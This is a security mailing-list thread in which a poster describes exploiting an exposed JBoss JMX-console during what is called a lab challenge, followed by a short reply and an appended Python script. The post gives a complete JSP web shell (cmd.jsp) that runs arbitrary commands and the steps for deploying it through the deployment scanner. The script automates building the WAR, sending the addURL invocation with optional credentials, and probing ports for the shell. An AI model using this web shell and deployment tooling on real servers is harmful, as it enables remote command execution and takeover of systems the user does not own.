Re: breaking jboss with a browser? not happening



On 14 January 2011 20:02, lazers <a.alii85@xxxxxxxxx> wrote:

I have been given the task of breaking into a JBoss application by my senior security
manager at my company.
It's a hacking challenge staged in a test lab. This is what I have been given:
web access to JBoss.
Yes, that's pretty much it <3. He believes in a less-is-more philosophy, with some
info to get started. I have been told that a vulnerability exists
in the application and it's no 0-day exploit; it's a known vulnerability. It is
set as an open-book challenge, I can get help anywhere I like. So what have I done
so far?


Yes, I googled; but I also ran a Nessus scan and the scan brought me one HIGH
vulnerability. It has to do with the default JBoss installation using the
JMX-Console. It's not a new vulnerability; I was able to reach this conclusion
as I started googling. This particular vulnerability is very popular; I was
saying to myself that my problems were over and I would break into
JBoss in record time. But that has been largely untrue. Why? Well, if it
weren't true I wouldn't be here. I did the following (in steps):


Attack vector: deployment scanner feature

1. Confirmed the default installation (by accessing localhost:9090). In my
case it's 9090, not 8080 as in the hacking literature. Probably this is because I'm using a
new version (I don't know the exact reason).

2. I wrote this JSP script (cmd.jsp) as told on the sites:

<%@ page import="java.util.*,java.io.*"%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
// Run whatever arrives in ?cmd= on the server and echo its stdout into the page.
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    // Read the process' stdout line by line; BufferedReader replaces the
    // deprecated DataInputStream.readLine() used in the copied version.
    BufferedReader dis = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String disr = dis.readLine();
    while (disr != null) {
        out.println(disr);
        disr = dis.readLine();
    }
    dis.close();
}
%>
</pre>
</BODY></HTML>



3. Next I created a web.xml file to be placed in the WEB-INF folder:



<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
         http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
         version="2.4">
  <servlet>
    <servlet-name>Command</servlet-name>
    <jsp-file>/cmd.jsp</jsp-file>
  </servlet>
</web-app>



4. I compiled the file cmd.jsp by placing the web.xml file in the WEB-INF folder:



jar cvf cmd.war WEB-INF cmd.jsp



5. I put this file on the Apache HTTP server. The file cmd.war resides in the htdocs
folder and can be accessed by the URL mywebserver:80/cmd.war



6. I go back to the JBoss default page and navigate myself to the
jboss.deployment page.



7. In the addURL tab I enter the path for my cmd.war file as

http://mywebserver/cmd.war



8. Next I go to the victim web server in an attempt to access my uploaded application:
http://victim:9090/cmd/cmd.jsp



9. I get HTTP STATUS 404 - /cmd/cmd.jsp



My app is supposed to be hot-deployed by JBoss, but this is not the case,
because even after accessing the file 10-20 times I get the same error
page. I want to know the reason for this behaviour. I know there
exist other attack vectors (e.g. RMI etc.) but I want to stick to this one
until I figure out the reason for this failure of the exploit.



Am I compiling the .jsp file with incorrect syntax? Do I need to have a Tomcat
server installed instead? I read on the internet that there could be some
problems with JBoss trying to get a reverse shell on your web server, as
JBoss works in bind-shell mode only? I'm really clueless as to what is
happening; I spent 12 works on this single attack vector but I'm not making
headway.



JBoss gurus, help me.


Metasploit has a plugin that will do this automatically against JBoss
if you know the credentials.

I'd also check where the file is being deployed. I did this in a test
once and there were two open ports; I installed the app on one but
then got a 404 when browsing to it, and when I accessed it through the
other port it worked fine.

Robin
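An added example, not code from either poster, that automates the procedure in the quoted post and the check Robin suggests: it builds cmd.war in memory (what the `jar cvf` step does), verifies that every `<jsp-file>` named in web.xml actually exists in the archive, prepares the JMX-console HtmlAdaptor request that invokes addURL on the URL deployment scanner, and probes each candidate web port for the deployed context so a 404 on one port and a 200 on another shows up in one run. The form field names (`action=invokeOp`, `name`, `methodIndex`, `arg0`) are those of the JBoss 4.x JMX console; the operation index of addURL differs between versions, so it is a caller-supplied parameter. The host names, ports and the one-line JSP body are constructed placeholders.

```python
"""Added example for the thread above (not code from the original posts).

Builds the cmd.war from the post in memory, checks it, prepares the JMX-console
invokeOp request for DeploymentScanner.addURL, and probes the candidate web
ports for the deployed context. Hosts, ports and the JSP body are constructed.
"""
import io
import zipfile
import xml.etree.ElementTree as ET
from base64 import b64encode
from urllib.error import HTTPError, URLError
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# Minimal JSP body standing in for the posted cmd.jsp (constructed placeholder).
CMD_JSP = '<%@ page import="java.io.*"%><%= request.getParameter("cmd") %>'

# web.xml as posted, with the stray ';' characters added by the mail archive removed.
WEB_XML = """<?xml version="1.0" ?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee
         http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"
         version="2.4">
  <servlet>
    <servlet-name>Command</servlet-name>
    <jsp-file>/cmd.jsp</jsp-file>
  </servlet>
</web-app>
"""

# JBoss 4.x object name of the URL-flavoured deployment scanner used in the post.
SCANNER_MBEAN = "jboss.deployment:type=DeploymentScanner,flavor=URL"


def build_war(jsp_name="cmd.jsp", jsp=CMD_JSP, web_xml=WEB_XML):
    """Equivalent of `jar cvf cmd.war WEB-INF cmd.jsp`; returns the WAR bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", web_xml)
        war.writestr(jsp_name, jsp)
    return buf.getvalue()


def war_entries(war_bytes):
    """Sorted list of archive entries, for inspection and tests."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def check_war(war_bytes):
    """Return <jsp-file> paths from WEB-INF/web.xml that are missing from the
    archive. Empty means the WAR is self-consistent; a mismatch here is one
    plain reason for a 404 after an otherwise successful deployment."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        names = set(war.namelist())
        root = ET.fromstring(war.read("WEB-INF/web.xml"))
    missing = []
    for el in root.iter():
        # Tags carry the J2EE namespace, so compare on the local name only.
        if el.tag.rsplit("}", 1)[-1] == "jsp-file" and el.text:
            path = el.text.strip().lstrip("/")
            if path not in names:
                missing.append(path)
    return missing


def addurl_request(jmx_base, war_url, method_index):
    """URL and form body that invoke addURL(war_url) on the scanner through
    /jmx-console/HtmlAdaptor. method_index is addURL's position in the MBean's
    operation list and varies by JBoss version (assumed, supplied by caller)."""
    params = {
        "action": "invokeOp",
        "name": SCANNER_MBEAN,
        "methodIndex": str(method_index),
        "arg0": war_url,
    }
    return jmx_base.rstrip("/") + "/jmx-console/HtmlAdaptor", urlencode(params).encode()


def invoke_addurl(jmx_base, war_url, method_index, credentials=None, timeout=10):
    """Send the invokeOp request; credentials=(user, password) adds HTTP Basic
    auth for consoles that are not left open. Returns the HTTP status code."""
    url, body = addurl_request(jmx_base, war_url, method_index)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    if credentials:
        headers["Authorization"] = "Basic " + b64encode(":".join(credentials).encode()).decode()
    with urlopen(Request(url, data=body, headers=headers), timeout=timeout) as resp:
        return resp.status


def probe_context(host, path="/cmd/cmd.jsp", ports=(8080, 9090), timeout=5):
    """Request the deployed page on every candidate port; returns {port: status},
    with None for ports that do not answer. 200 on one port and 404 on another
    is exactly the situation Robin describes."""
    results = {}
    for port in ports:
        try:
            with urlopen(f"http://{host}:{port}{path}", timeout=timeout) as resp:
                results[port] = resp.status
        except HTTPError as err:
            results[port] = err.code
        except URLError:
            results[port] = None
    return results


def deployed_ports(results):
    """Ports on which the context answered with a non-error status."""
    return sorted(p for p, s in results.items() if s is not None and s < 400)


if __name__ == "__main__":
    war = build_war()
    print("entries:", war_entries(war), "missing:", check_war(war))
    print(*addurl_request("http://victim:9090", "http://mywebserver/cmd.war", 0))
    # Network steps, lab only (method index 0 is a placeholder, not a known value):
    # invoke_addurl("http://victim:9090", "http://mywebserver/cmd.war", 0)
    # print(deployed_ports(probe_context("victim")))
```

Run `check_war` before pointing the scanner at the WAR: a web.xml that names a JSP the archive does not contain, or a WAR built from the wrong directory, deploys without complaint and then answers 404. After invoking addURL, `probe_context` against every port the target has open tells you whether the context landed on a different connector than the one you were browsing.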



